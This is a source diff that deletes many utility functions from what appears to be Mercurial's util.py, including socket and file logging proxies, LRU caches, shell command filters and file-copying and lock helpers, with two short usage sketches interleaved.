- def __setattr__(self, name, value):
- return setattr(object.__getattribute__(self, r'_orig'), name, value)
-
- def __nonzero__(self):
- return bool(object.__getattribute__(self, r'_orig'))
-
- __bool__ = __nonzero__
-
- def _observedcall(self, name, *args, **kwargs):
- # Call the original object.
- orig = object.__getattribute__(self, r'_orig')
- res = getattr(orig, name)(*args, **kwargs)
-
- # Call a method on the observer of the same name with arguments
- # so it can react, log, etc.
- observer = object.__getattribute__(self, r'_observer')
- fn = getattr(observer, name, None)
- if fn:
- fn(res, *args, **kwargs)
-
- return res
-
- def makefile(self, *args, **kwargs):
- res = object.__getattribute__(self, r'_observedcall')(
- r'makefile', *args, **kwargs)
-
- # The file object may be used for I/O. So we turn it into a
- # proxy using our observer.
- observer = object.__getattribute__(self, r'_observer')
- return makeloggingfileobject(observer.fh, res, observer.name,
- reads=observer.reads,
- writes=observer.writes,
- logdata=observer.logdata,
- logdataapis=observer.logdataapis)
-
- def recv(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'recv', *args, **kwargs)
-
- def recvfrom(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'recvfrom', *args, **kwargs)
-
- def recvfrom_into(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'recvfrom_into', *args, **kwargs)
-
- def recv_into(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'recv_info', *args, **kwargs)
-
- def send(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'send', *args, **kwargs)
-
- def sendall(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'sendall', *args, **kwargs)
-
- def sendto(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'sendto', *args, **kwargs)
-
- def setblocking(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'setblocking', *args, **kwargs)
-
- def settimeout(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'settimeout', *args, **kwargs)
-
- def gettimeout(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'gettimeout', *args, **kwargs)
-
- def setsockopt(self, *args, **kwargs):
- return object.__getattribute__(self, r'_observedcall')(
- r'setsockopt', *args, **kwargs)
_DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
_DATA_ESCAPE_MAP.update({
@@ -822,1755 +35,10 @@ def escapedata(s):
return _DATA_ESCAPE_RE.sub(lambda m: _DATA_ESCAPE_MAP[m.group(0)], s)
-class baseproxyobserver(object):
- def _writedata(self, data):
- if not self.logdata:
- if self.logdataapis:
- self.fh.write('\n')
- self.fh.flush()
- return
-
- # Simple case writes all data on a single line.
- if b'\n' not in data:
- if self.logdataapis:
- self.fh.write(': %s\n' % escapedata(data))
- else:
- self.fh.write('%s> %s\n' % (self.name, escapedata(data)))
- self.fh.flush()
- return
-
- # Data with newlines is written to multiple lines.
- if self.logdataapis:
- self.fh.write(':\n')
-
- lines = data.splitlines(True)
- for line in lines:
- self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
- self.fh.flush()
-
-class fileobjectobserver(baseproxyobserver):
- """Logs file object activity."""
- def __init__(self, fh, name, reads=True, writes=True, logdata=False,
- logdataapis=True):
- self.fh = fh
- self.name = name
- self.logdata = logdata
- self.logdataapis = logdataapis
- self.reads = reads
- self.writes = writes
-
- def read(self, res, size=-1):
- if not self.reads:
- return
- # Python 3 can return None from reads at EOF instead of empty strings.
- if res is None:
- res = ''
-
- if self.logdataapis:
- self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
-
- self._writedata(res)
-
- def readline(self, res, limit=-1):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
-
- self._writedata(res)
-
- def readinto(self, res, dest):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
- res))
-
- data = dest[0:res] if res is not None else b''
- self._writedata(data)
-
- def write(self, res, data):
- if not self.writes:
- return
-
- # Python 2 returns None from some write() calls. Python 3 (reasonably)
- # returns the integer bytes written.
- if res is None and data:
- res = len(data)
-
- if self.logdataapis:
- self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
-
- self._writedata(data)
-
- def flush(self, res):
- if not self.writes:
- return
-
- self.fh.write('%s> flush() -> %r\n' % (self.name, res))
-
- # For observedbufferedinputpipe.
- def bufferedread(self, res, size):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> bufferedread(%d) -> %d' % (
- self.name, size, len(res)))
-
- self._writedata(res)
-
- def bufferedreadline(self, res):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> bufferedreadline() -> %d' % (
- self.name, len(res)))
-
- self._writedata(res)
-
-def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
- logdata=False, logdataapis=True):
- """Turn a file object into a logging file object."""
-
- observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
- logdata=logdata, logdataapis=logdataapis)
- return fileobjectproxy(fh, observer)
-
-class socketobserver(baseproxyobserver):
- """Logs socket activity."""
- def __init__(self, fh, name, reads=True, writes=True, states=True,
- logdata=False, logdataapis=True):
- self.fh = fh
- self.name = name
- self.reads = reads
- self.writes = writes
- self.states = states
- self.logdata = logdata
- self.logdataapis = logdataapis
-
- def makefile(self, res, mode=None, bufsize=None):
- if not self.states:
- return
-
- self.fh.write('%s> makefile(%r, %r)\n' % (
- self.name, mode, bufsize))
-
- def recv(self, res, size, flags=0):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> recv(%d, %d) -> %d' % (
- self.name, size, flags, len(res)))
- self._writedata(res)
-
- def recvfrom(self, res, size, flags=0):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
- self.name, size, flags, len(res[0])))
-
- self._writedata(res[0])
-
- def recvfrom_into(self, res, buf, size, flags=0):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
- self.name, size, flags, res[0]))
-
- self._writedata(buf[0:res[0]])
-
- def recv_into(self, res, buf, size=0, flags=0):
- if not self.reads:
- return
-
- if self.logdataapis:
- self.fh.write('%s> recv_into(%d, %d) -> %d' % (
- self.name, size, flags, res))
-
- self._writedata(buf[0:res])
-
- def send(self, res, data, flags=0):
- if not self.writes:
- return
-
- self.fh.write('%s> send(%d, %d) -> %d' % (
- self.name, len(data), flags, len(res)))
- self._writedata(data)
-
- def sendall(self, res, data, flags=0):
- if not self.writes:
- return
-
- if self.logdataapis:
- # Returns None on success. So don't bother reporting return value.
- self.fh.write('%s> sendall(%d, %d)' % (
- self.name, len(data), flags))
-
- self._writedata(data)
-
- def sendto(self, res, data, flagsoraddress, address=None):
- if not self.writes:
- return
-
- if address:
- flags = flagsoraddress
- else:
- flags = 0
-
- if self.logdataapis:
- self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
- self.name, len(data), flags, address, res))
-
- self._writedata(data)
-
- def setblocking(self, res, flag):
- if not self.states:
- return
-
- self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
-
- def settimeout(self, res, value):
- if not self.states:
- return
-
- self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
-
- def gettimeout(self, res):
- if not self.states:
- return
-
- self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
-
- def setsockopt(self, level, optname, value):
- if not self.states:
- return
-
- self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
- self.name, level, optname, value))
-
-def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
- logdata=False, logdataapis=True):
- """Turn a socket into a logging socket."""
-
- observer = socketobserver(logh, name, reads=reads, writes=writes,
- states=states, logdata=logdata,
- logdataapis=logdataapis)
- return socketproxy(fh, observer)
-
-def version():
- """Return version information if available."""
- try:
- from . import __version__
- return __version__.version
- except ImportError:
- return 'unknown'
-
-def versiontuple(v=None, n=4):
- """Parses a Mercurial version string into an N-tuple.
-
- The version string to be parsed is specified with the ``v`` argument.
- If it isn't defined, the current Mercurial version string will be parsed.
-
- ``n`` can be 2, 3, or 4. Here is how some version strings map to
- returned values:
-
- >>> v = b'3.6.1+190-df9b73d2d444'
- >>> versiontuple(v, 2)
- (3, 6)
- >>> versiontuple(v, 3)
- (3, 6, 1)
- >>> versiontuple(v, 4)
- (3, 6, 1, '190-df9b73d2d444')
-
- >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
- (3, 6, 1, '190-df9b73d2d444+20151118')
-
- >>> v = b'3.6'
- >>> versiontuple(v, 2)
- (3, 6)
- >>> versiontuple(v, 3)
- (3, 6, None)
- >>> versiontuple(v, 4)
- (3, 6, None, None)
-
- >>> v = b'3.9-rc'
- >>> versiontuple(v, 2)
- (3, 9)
- >>> versiontuple(v, 3)
- (3, 9, None)
- >>> versiontuple(v, 4)
- (3, 9, None, 'rc')
-
- >>> v = b'3.9-rc+2-02a8fea4289b'
- >>> versiontuple(v, 2)
- (3, 9)
- >>> versiontuple(v, 3)
- (3, 9, None)
- >>> versiontuple(v, 4)
- (3, 9, None, 'rc+2-02a8fea4289b')
- """
- if not v:
- v = version()
- parts = remod.split('[\+-]', v, 1)
- if len(parts) == 1:
- vparts, extra = parts[0], None
- else:
- vparts, extra = parts
-
- vints = []
- for i in vparts.split('.'):
- try:
- vints.append(int(i))
- except ValueError:
- break
- # (3, 6) -> (3, 6, None)
- while len(vints) < 3:
- vints.append(None)
-
- if n == 2:
- return (vints[0], vints[1])
- if n == 3:
- return (vints[0], vints[1], vints[2])
- if n == 4:
- return (vints[0], vints[1], vints[2], extra)
-
-def cachefunc(func):
- '''cache the result of function calls'''
- # XXX doesn't handle keywords args
- if func.__code__.co_argcount == 0:
- cache = []
- def f():
- if len(cache) == 0:
- cache.append(func())
- return cache[0]
- return f
- cache = {}
- if func.__code__.co_argcount == 1:
- # we gain a small amount of time because
- # we don't need to pack/unpack the list
- def f(arg):
- if arg not in cache:
- cache[arg] = func(arg)
- return cache[arg]
- else:
- def f(*args):
- if args not in cache:
- cache[args] = func(*args)
- return cache[args]
-
- return f
-
-class cow(object):
- """helper class to make copy-on-write easier
-
- Call preparewrite before doing any writes.
- """
-
- def preparewrite(self):
- """call this before writes, return self or a copied new object"""
- if getattr(self, '_copied', 0):
- self._copied -= 1
- return self.__class__(self)
- return self
-
- def copy(self):
- """always do a cheap copy"""
- self._copied = getattr(self, '_copied', 0) + 1
- return self
-
-class sortdict(collections.OrderedDict):
- '''a simple sorted dictionary
-
- >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
- >>> d2 = d1.copy()
- >>> d2
- sortdict([('a', 0), ('b', 1)])
- >>> d2.update([(b'a', 2)])
- >>> list(d2.keys()) # should still be in last-set order
- ['b', 'a']
- '''
-
- def __setitem__(self, key, value):
- if key in self:
- del self[key]
- super(sortdict, self).__setitem__(key, value)
-
- if pycompat.ispypy:
- # __setitem__() isn't called as of PyPy 5.8.0
- def update(self, src):
- if isinstance(src, dict):
- src = src.iteritems()
- for k, v in src:
- self[k] = v
-
-class cowdict(cow, dict):
- """copy-on-write dict
-
- Be sure to call d = d.preparewrite() before writing to d.
-
- >>> a = cowdict()
- >>> a is a.preparewrite()
- True
- >>> b = a.copy()
- >>> b is a
- True
- >>> c = b.copy()
- >>> c is a
- True
- >>> a = a.preparewrite()
- >>> b is a
- False
- >>> a is a.preparewrite()
- True
- >>> c = c.preparewrite()
- >>> b is c
- False
- >>> b is b.preparewrite()
- True
- """
-
-class cowsortdict(cow, sortdict):
- """copy-on-write sortdict
-
- Be sure to call d = d.preparewrite() before writing to d.
- """
-
-class transactional(object):
- """Base class for making a transactional type into a context manager."""
- __metaclass__ = abc.ABCMeta
-
- @abc.abstractmethod
- def close(self):
- """Successfully closes the transaction."""
-
- @abc.abstractmethod
- def release(self):
- """Marks the end of the transaction.
-
- If the transaction has not been closed, it will be aborted.
- """
-
- def __enter__(self):
- return self
-
- def __exit__(self, exc_type, exc_val, exc_tb):
- try:
- if exc_type is None:
- self.close()
- finally:
- self.release()
-
-@contextlib.contextmanager
-def acceptintervention(tr=None):
- """A context manager that closes the transaction on InterventionRequired
-
- If no transaction was provided, this simply runs the body and returns
- """
- if not tr:
- yield
- return
- try:
- yield
- tr.close()
- except error.InterventionRequired:
- tr.close()
- raise
- finally:
- tr.release()
-
-@contextlib.contextmanager
-def nullcontextmanager():
- yield
-
-class _lrucachenode(object):
- """A node in a doubly linked list.
-
- Holds a reference to nodes on either side as well as a key-value
- pair for the dictionary entry.
- """
- __slots__ = (u'next', u'prev', u'key', u'value')
-
- def __init__(self):
- self.next = None
- self.prev = None
-
- self.key = _notset
- self.value = None
-
- def markempty(self):
- """Mark the node as emptied."""
- self.key = _notset
-
-class lrucachedict(object):
- """Dict that caches most recent accesses and sets.
-
- The dict consists of an actual backing dict - indexed by original
- key - and a doubly linked circular list defining the order of entries in
- the cache.
-
- The head node is the newest entry in the cache. If the cache is full,
- we recycle head.prev and make it the new head. Cache accesses result in
- the node being moved to before the existing head and being marked as the
- new head node.
- """
- def __init__(self, max):
- self._cache = {}
-
- self._head = head = _lrucachenode()
- head.prev = head
- head.next = head
- self._size = 1
- self._capacity = max
-
- def __len__(self):
- return len(self._cache)
-
- def __contains__(self, k):
- return k in self._cache
-
- def __iter__(self):
- # We don't have to iterate in cache order, but why not.
- n = self._head
- for i in range(len(self._cache)):
- yield n.key
- n = n.next
-
- def __getitem__(self, k):
- node = self._cache[k]
- self._movetohead(node)
- return node.value
-
- def __setitem__(self, k, v):
- node = self._cache.get(k)
- # Replace existing value and mark as newest.
- if node is not None:
- node.value = v
- self._movetohead(node)
- return
-
- if self._size < self._capacity:
- node = self._addcapacity()
- else:
- # Grab the last/oldest item.
- node = self._head.prev
-
- # At capacity. Kill the old entry.
- if node.key is not _notset:
- del self._cache[node.key]
-
- node.key = k
- node.value = v
- self._cache[k] = node
- # And mark it as newest entry. No need to adjust order since it
- # is already self._head.prev.
- self._head = node
-
- def __delitem__(self, k):
- node = self._cache.pop(k)
- node.markempty()
-
- # Temporarily mark as newest item before re-adjusting head to make
- # this node the oldest item.
- self._movetohead(node)
- self._head = node.next
-
- # Additional dict methods.
-
- def get(self, k, default=None):
- try:
- return self._cache[k].value
- except KeyError:
- return default
-
- def clear(self):
- n = self._head
- while n.key is not _notset:
- n.markempty()
- n = n.next
-
- self._cache.clear()
-
- def copy(self):
- result = lrucachedict(self._capacity)
- n = self._head.prev
- # Iterate in oldest-to-newest order, so the copy has the right ordering
- for i in range(len(self._cache)):
- result[n.key] = n.value
- n = n.prev
- return result
-
- def _movetohead(self, node):
- """Mark a node as the newest, making it the new head.
-
- When a node is accessed, it becomes the freshest entry in the LRU
- list, which is denoted by self._head.
-
- Visually, let's make ``N`` the new head node (* denotes head):
-
- previous/oldest <-> head <-> next/next newest
-
- ----<->--- A* ---<->-----
- | |
- E <-> D <-> N <-> C <-> B
-
- To:
-
- ----<->--- N* ---<->-----
- | |
- E <-> D <-> C <-> B <-> A
-
- This requires the following moves:
-
- C.next = D (node.prev.next = node.next)
- D.prev = C (node.next.prev = node.prev)
- E.next = N (head.prev.next = node)
- N.prev = E (node.prev = head.prev)
- N.next = A (node.next = head)
- A.prev = N (head.prev = node)
- """
- head = self._head
- # C.next = D
- node.prev.next = node.next
- # D.prev = C
- node.next.prev = node.prev
- # N.prev = E
- node.prev = head.prev
- # N.next = A
- # It is tempting to do just "head" here, however if node is
- # adjacent to head, this will do bad things.
- node.next = head.prev.next
- # E.next = N
- node.next.prev = node
- # A.prev = N
- node.prev.next = node
-
- self._head = node
-
- def _addcapacity(self):
- """Add a node to the circular linked list.
-
- The new node is inserted before the head node.
- """
- head = self._head
- node = _lrucachenode()
- head.prev.next = node
- node.prev = head.prev
- node.next = head
- head.prev = node
- self._size += 1
- return node
-
-def lrucachefunc(func):
- '''cache most recent results of function calls'''
- cache = {}
- order = collections.deque()
- if func.__code__.co_argcount == 1:
- def f(arg):
- if arg not in cache:
- if len(cache) > 20:
- del cache[order.popleft()]
- cache[arg] = func(arg)
- else:
- order.remove(arg)
- order.append(arg)
- return cache[arg]
- else:
- def f(*args):
- if args not in cache:
- if len(cache) > 20:
- del cache[order.popleft()]
- cache[args] = func(*args)
- else:
- order.remove(args)
- order.append(args)
- return cache[args]
-
- return f
-
-class propertycache(object):
- def __init__(self, func):
- self.func = func
- self.name = func.__name__
- def __get__(self, obj, type=None):
- result = self.func(obj)
- self.cachevalue(obj, result)
- return result
-
- def cachevalue(self, obj, value):
- # __dict__ assignment required to bypass __setattr__ (eg: repoview)
- obj.__dict__[self.name] = value
-
-def clearcachedproperty(obj, prop):
- '''clear a cached property value, if one has been set'''
- if prop in obj.__dict__:
- del obj.__dict__[prop]
-
-def pipefilter(s, cmd):
- '''filter string S through command CMD, returning its output'''
- p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
- stdin=subprocess.PIPE, stdout=subprocess.PIPE)
- pout, perr = p.communicate(s)
- return pout
-
-def tempfilter(s, cmd):
- '''filter string S through a pair of temporary files with CMD.
- CMD is used as a template to create the real command to be run,
- with the strings INFILE and OUTFILE replaced by the real names of
- the temporary files generated.'''
- inname, outname = None, None
- try:
- infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
- fp = os.fdopen(infd, r'wb')
- fp.write(s)
- fp.close()
- outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
- os.close(outfd)
- cmd = cmd.replace('INFILE', inname)
- cmd = cmd.replace('OUTFILE', outname)
- code = os.system(cmd)
- if pycompat.sysplatform == 'OpenVMS' and code & 1:
- code = 0
- if code:
- raise Abort(_("command '%s' failed: %s") %
- (cmd, explainexit(code)))
- return readfile(outname)
- finally:
- try:
- if inname:
- os.unlink(inname)
- except OSError:
- pass
- try:
- if outname:
- os.unlink(outname)
- except OSError:
- pass
-
-filtertable = {
- 'tempfile:': tempfilter,
- 'pipe:': pipefilter,
- }
-
-def filter(s, cmd):
- "filter a string through a command that transforms its input to its output"
- for name, fn in filtertable.iteritems():
- if cmd.startswith(name):
- return fn(s, cmd[len(name):].lstrip())
- return pipefilter(s, cmd)
-
def binary(s):
"""return true if a string is binary data"""
return bool(s and '\0' in s)
-def increasingchunks(source, min=1024, max=65536):
- '''return no less than min bytes per chunk while data remains,
- doubling min after each chunk until it reaches max'''
- def log2(x):
- if not x:
- return 0
- i = 0
- while x:
- x >>= 1
- i += 1
- return i - 1
-
- buf = []
- blen = 0
- for chunk in source:
- buf.append(chunk)
- blen += len(chunk)
- if blen >= min:
- if min < max:
- min = min << 1
- nmin = 1 << log2(blen)
- if nmin > min:
- min = nmin
- if min > max:
- min = max
- yield ''.join(buf)
- blen = 0
- buf = []
- if buf:
- yield ''.join(buf)
-
-Abort = error.Abort
-
-def always(fn):
- return True
-
-def never(fn):
- return False
-
-def nogc(func):
- """disable garbage collector
-
- Python's garbage collector triggers a GC each time a certain number of
- container objects (the number being defined by gc.get_threshold()) are
- allocated even when marked not to be tracked by the collector. Tracking has
- no effect on when GCs are triggered, only on what objects the GC looks
- into. As a workaround, disable GC while building complex (huge)
- containers.
-
- This garbage collector issue have been fixed in 2.7. But it still affect
- CPython's performance.
- """
- def wrapper(*args, **kwargs):
- gcenabled = gc.isenabled()
- gc.disable()
- try:
- return func(*args, **kwargs)
- finally:
- if gcenabled:
- gc.enable()
- return wrapper
-
-if pycompat.ispypy:
- # PyPy runs slower with gc disabled
- nogc = lambda x: x
-
-def pathto(root, n1, n2):
- '''return the relative path from one place to another.
- root should use os.sep to separate directories
- n1 should use os.sep to separate directories
- n2 should use "/" to separate directories
- returns an os.sep-separated path.
-
- If n1 is a relative path, it's assumed it's
- relative to root.
- n2 should always be relative to root.
- '''
- if not n1:
- return localpath(n2)
- if os.path.isabs(n1):
- if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
- return os.path.join(root, localpath(n2))
- n2 = '/'.join((pconvert(root), n2))
- a, b = splitpath(n1), n2.split('/')
- a.reverse()
- b.reverse()
- while a and b and a[-1] == b[-1]:
- a.pop()
- b.pop()
- b.reverse()
- return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
-
-def mainfrozen():
- """return True if we are a frozen executable.
-
- The code supports py2exe (most common, Windows only) and tools/freeze
- (portable, not much used).
- """
- return (safehasattr(sys, "frozen") or # new py2exe
- safehasattr(sys, "importers") or # old py2exe
- imp.is_frozen(u"__main__")) # tools/freeze
-
-# the location of data files matching the source code
-if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
- # executable version (py2exe) doesn't support __file__
- datapath = os.path.dirname(pycompat.sysexecutable)
-else:
- datapath = os.path.dirname(pycompat.fsencode(__file__))
-
-i18n.setdatapath(datapath)
-
-_hgexecutable = None
-
-def hgexecutable():
- """return location of the 'hg' executable.
-
- Defaults to $HG or 'hg' in the search path.
- """
- if _hgexecutable is None:
- hg = encoding.environ.get('HG')
- mainmod = sys.modules[r'__main__']
- if hg:
- _sethgexecutable(hg)
- elif mainfrozen():
- if getattr(sys, 'frozen', None) == 'macosx_app':
- # Env variable set by py2app
- _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
- else:
- _sethgexecutable(pycompat.sysexecutable)
- elif (os.path.basename(
- pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
- _sethgexecutable(pycompat.fsencode(mainmod.__file__))
- else:
- exe = findexe('hg') or os.path.basename(sys.argv[0])
- _sethgexecutable(exe)
- return _hgexecutable
-
-def _sethgexecutable(path):
- """set location of the 'hg' executable"""
- global _hgexecutable
- _hgexecutable = path
-
-def _testfileno(f, stdf):
- fileno = getattr(f, 'fileno', None)
- try:
- return fileno and fileno() == stdf.fileno()
- except io.UnsupportedOperation:
- return False # fileno() raised UnsupportedOperation
-
-def isstdin(f):
- return _testfileno(f, sys.__stdin__)
-
-def isstdout(f):
- return _testfileno(f, sys.__stdout__)
-
-def shellenviron(environ=None):
- """return environ with optional override, useful for shelling out"""
- def py2shell(val):
- 'convert python object into string that is useful to shell'
- if val is None or val is False:
- return '0'
- if val is True:
- return '1'
- return pycompat.bytestr(val)
- env = dict(encoding.environ)
- if environ:
- env.update((k, py2shell(v)) for k, v in environ.iteritems())
- env['HG'] = hgexecutable()
- return env
-
-def system(cmd, environ=None, cwd=None, out=None):
- '''enhanced shell command execution.
- run with environment maybe modified, maybe in different dir.
-
- if out is specified, it is assumed to be a file-like object that has a
- write() method. stdout and stderr will be redirected to out.'''
- try:
- stdout.flush()
- except Exception:
- pass
- cmd = quotecommand(cmd)
- env = shellenviron(environ)
- if out is None or isstdout(out):
- rc = subprocess.call(cmd, shell=True, close_fds=closefds,
- env=env, cwd=cwd)
- else:
- proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
- env=env, cwd=cwd, stdout=subprocess.PIPE,
- stderr=subprocess.STDOUT)
- for line in iter(proc.stdout.readline, ''):
- out.write(line)
- proc.wait()
- rc = proc.returncode
- if pycompat.sysplatform == 'OpenVMS' and rc & 1:
- rc = 0
- return rc
-
-def checksignature(func):
- '''wrap a function with code to check for calling errors'''
- def check(*args, **kwargs):
- try:
- return func(*args, **kwargs)
- except TypeError:
- if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
- raise error.SignatureError
- raise
-
- return check
-
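A sketch of checksignature in use: a TypeError raised directly at the call
site (a traceback of exactly one frame) is reported as a SignatureError,
while a TypeError from deeper inside the wrapped function propagates
unchanged:

    add = checksignature(lambda a, b: a + b)
    add(1, 2)    # -> 3
    add(1)       # raises error.SignatureError, not a bare TypeError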
-# a whitelist of known filesystems where hardlinks work reliably
-_hardlinkfswhitelist = {
- 'btrfs',
- 'ext2',
- 'ext3',
- 'ext4',
- 'hfs',
- 'jfs',
- 'NTFS',
- 'reiserfs',
- 'tmpfs',
- 'ufs',
- 'xfs',
- 'zfs',
-}
-
-def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
- '''copy a file, preserving mode and optionally other stat info like
- atime/mtime
-
- checkambig argument is used with filestat, and is useful only if
- destination file is guarded by any lock (e.g. repo.lock or
- repo.wlock).
-
- copystat and checkambig should be exclusive.
- '''
- assert not (copystat and checkambig)
- oldstat = None
- if os.path.lexists(dest):
- if checkambig:
-            oldstat = filestat.frompath(dest)
- unlink(dest)
- if hardlink:
- # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
- # unless we are confident that dest is on a whitelisted filesystem.
- try:
- fstype = getfstype(os.path.dirname(dest))
- except OSError:
- fstype = None
- if fstype not in _hardlinkfswhitelist:
- hardlink = False
- if hardlink:
- try:
- oslink(src, dest)
- return
- except (IOError, OSError):
- pass # fall back to normal copy
- if os.path.islink(src):
- os.symlink(os.readlink(src), dest)
- # copytime is ignored for symlinks, but in general copytime isn't needed
- # for them anyway
- else:
- try:
- shutil.copyfile(src, dest)
- if copystat:
- # copystat also copies mode
- shutil.copystat(src, dest)
- else:
- shutil.copymode(src, dest)
- if oldstat and oldstat.stat:
- newstat = filestat.frompath(dest)
- if newstat.isambig(oldstat):
- # stat of copied file is ambiguous to original one
- advanced = (
- oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
- os.utime(dest, (advanced, advanced))
- except shutil.Error as inst:
- raise Abort(str(inst))
-
-def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
- """Copy a directory tree using hardlinks if possible."""
- num = 0
-
- gettopic = lambda: hardlink and _('linking') or _('copying')
-
- if os.path.isdir(src):
- if hardlink is None:
- hardlink = (os.stat(src).st_dev ==
- os.stat(os.path.dirname(dst)).st_dev)
- topic = gettopic()
- os.mkdir(dst)
- for name, kind in listdir(src):
- srcname = os.path.join(src, name)
- dstname = os.path.join(dst, name)
- def nprog(t, pos):
- if pos is not None:
- return progress(t, pos + num)
- hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
- num += n
- else:
- if hardlink is None:
- hardlink = (os.stat(os.path.dirname(src)).st_dev ==
- os.stat(os.path.dirname(dst)).st_dev)
- topic = gettopic()
-
- if hardlink:
- try:
- oslink(src, dst)
- except (IOError, OSError):
- hardlink = False
- shutil.copy(src, dst)
- else:
- shutil.copy(src, dst)
- num += 1
- progress(topic, num)
- progress(topic, None)
-
- return hardlink, num
-
-_winreservednames = {
- 'con', 'prn', 'aux', 'nul',
- 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
- 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
-}
-_winreservedchars = ':*?"<>|'
-def checkwinfilename(path):
- r'''Check that the base-relative path is a valid filename on Windows.
- Returns None if the path is ok, or a UI string describing the problem.
-
- >>> checkwinfilename(b"just/a/normal/path")
- >>> checkwinfilename(b"foo/bar/con.xml")
- "filename contains 'con', which is reserved on Windows"
- >>> checkwinfilename(b"foo/con.xml/bar")
- "filename contains 'con', which is reserved on Windows"
- >>> checkwinfilename(b"foo/bar/xml.con")
- >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
- "filename contains 'AUX', which is reserved on Windows"
- >>> checkwinfilename(b"foo/bar/bla:.txt")
- "filename contains ':', which is reserved on Windows"
- >>> checkwinfilename(b"foo/bar/b\07la.txt")
- "filename contains '\\x07', which is invalid on Windows"
- >>> checkwinfilename(b"foo/bar/bla ")
- "filename ends with ' ', which is not allowed on Windows"
- >>> checkwinfilename(b"../bar")
- >>> checkwinfilename(b"foo\\")
- "filename ends with '\\', which is invalid on Windows"
- >>> checkwinfilename(b"foo\\/bar")
- "directory name ends with '\\', which is invalid on Windows"
- '''
- if path.endswith('\\'):
- return _("filename ends with '\\', which is invalid on Windows")
- if '\\/' in path:
- return _("directory name ends with '\\', which is invalid on Windows")
- for n in path.replace('\\', '/').split('/'):
- if not n:
- continue
- for c in _filenamebytestr(n):
- if c in _winreservedchars:
- return _("filename contains '%s', which is reserved "
- "on Windows") % c
- if ord(c) <= 31:
- return _("filename contains '%s', which is invalid "
- "on Windows") % escapestr(c)
- base = n.split('.')[0]
- if base and base.lower() in _winreservednames:
- return _("filename contains '%s', which is reserved "
- "on Windows") % base
- t = n[-1:]
- if t in '. ' and n not in '..':
- return _("filename ends with '%s', which is not allowed "
- "on Windows") % t
-
-if pycompat.iswindows:
- checkosfilename = checkwinfilename
- timer = time.clock
-else:
- checkosfilename = platform.checkosfilename
- timer = time.time
-
-if safehasattr(time, "perf_counter"):
- timer = time.perf_counter
-
-def makelock(info, pathname):
- """Create a lock file atomically if possible
-
-    This may leave a stale lock file if symlinks aren't supported and the
-    process is interrupted by a signal.
- """
- try:
- return os.symlink(info, pathname)
- except OSError as why:
- if why.errno == errno.EEXIST:
- raise
- except AttributeError: # no symlink in os
- pass
-
- flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
- ld = os.open(pathname, flags)
- os.write(ld, info)
- os.close(ld)
-
-def readlock(pathname):
- try:
- return os.readlink(pathname)
- except OSError as why:
- if why.errno not in (errno.EINVAL, errno.ENOSYS):
- raise
- except AttributeError: # no symlink in os
- pass
- fp = posixfile(pathname, 'rb')
- r = fp.read()
- fp.close()
- return r
-
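A sketch of the lock round-trip (path and contents are illustrative):
makelock stores the info as a symlink target where the platform allows it,
falling back to an O_EXCL regular file, and readlock reverses either
representation:

    makelock(b'myhost:12345', b'.hg/store/lock')
    readlock(b'.hg/store/lock')    # -> b'myhost:12345'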
-def fstat(fp):
- '''stat file object that may not have fileno method.'''
- try:
- return os.fstat(fp.fileno())
- except AttributeError:
- return os.stat(fp.name)
-
-# File system features
-
